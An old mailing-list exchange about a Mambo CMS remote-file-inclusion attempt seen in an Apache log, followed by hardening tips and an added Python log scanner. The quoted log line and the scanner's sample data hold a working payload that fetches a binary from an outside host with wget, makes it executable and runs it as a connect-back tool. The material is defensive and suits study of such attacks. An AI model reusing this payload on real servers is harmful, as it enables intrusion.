Just a couple of things: Apache configured with mod_rewrite to deny blank or fake referers is a good idea.
Do you have Apache configured with mod_security? I highly recommend this last one since you run a PHP-based CMS and it can protect from exploits not yet discovered.

On Mon, January 23, 2006 2:32 am, Maik Holtkamp said:
> Edward Shornock wrote:
>> > On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote:
>> > Hi,
>> >
>> > yesterday morning I found a strange entry in my apache log files (debian
>> > sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
>> > server, just serving my family and some good friends (normally).
>> >
>> > ---cut---
>> > 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
>> > /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20
>> > 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo|
>> > HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
>> > ---cut---
>> >
>> > As I patched mambo against the recent "register global" attack and my /tmp
>> > is mounted noexec, the attack doesn't exploit anything.
>> >
>> > However, I curiously downloaded this sexy executable to have a closer look.
>> >
>> > ---cut---
>> > backup:/home/qmb# ./sexy -h
>> > ./sexy <host> <port>
>> > ---cut---
>> >
>> Never run apps like this as root. Bad bad idea.
>
> There is an old saying in Germany:
>
> "Only damage will make you wise"

Funny, Don Quixote (when in a good mood) used to say, "Sancho, why does experience always come when it is not needed?"*

*I am just paraphrasing...

--
-JM.
These blue days and this sun of childhood (Antonio Machado, 1939)
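Requests of the kind quoted in this thread can be picked out of an Apache access log mechanically. The following is an added example, not part of the original messages or of any project named in them: it flags parameters that overwrite PHP superglobals, carry a remote URL, or carry shell commands. The sample log lines, the function names `inspect_line` and `split_query`, and the three patterns are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Apache common/combined log prefix: host ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)
# PHP superglobal names that a client has no business sending as parameters.
SUPERGLOBAL = re.compile(r'^(?:GLOBALS|_(?:REQUEST|GET|POST|COOKIE|SERVER|ENV|FILES))(?:\[|$)')
SHELL_CMD = re.compile(r'\b(?:wget|curl|chmod)\b|;\s*\./')

# Constructed sample lines (documentation addresses, not taken from the thread).
SAMPLE = [
    '192.0.2.10 - - [19/Jan/2006:07:08:32 +0100] "GET /cvs/index2.php?_REQUEST[option]=com_content'
    '&GLOBALS=&mosConfig_absolute_path=http://198.51.100.7/cmd.gif?&cmd=cd%20/tmp;wget%20198.51.100.8/x'
    ' HTTP/1.1" 200 28 "-" "Mozilla/4.0"',
    '192.0.2.20 - - [19/Jan/2006:07:10:01 +0100] "GET /cvs/index.php?option=com_content&Itemid=1'
    ' HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
]

def split_query(target):
    """Yield decoded (name, value) pairs, splitting on '&' only so ';' stays in the value."""
    _, _, query = target.partition('?')
    for pair in query.split('&'):
        if pair:
            name, _, value = pair.partition('=')
            yield unquote(name), unquote(value)

def inspect_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, when, _method, target, status = m.groups()
    reasons = []
    for name, value in split_query(target):
        if SUPERGLOBAL.match(name):
            reasons.append(f'superglobal overwrite: {name}')
        if REMOTE_URL.match(value):
            reasons.append(f'remote URL in parameter: {name}')
        if SHELL_CMD.search(value):
            reasons.append(f'shell command in parameter: {name}')
    if not reasons:
        return None
    # A 200 only means the script answered; it does not show the include succeeded.
    return {'host': host, 'time': when, 'status': int(status), 'reasons': reasons}

if __name__ == '__main__':
    for entry in SAMPLE:
        print(inspect_line(entry))
```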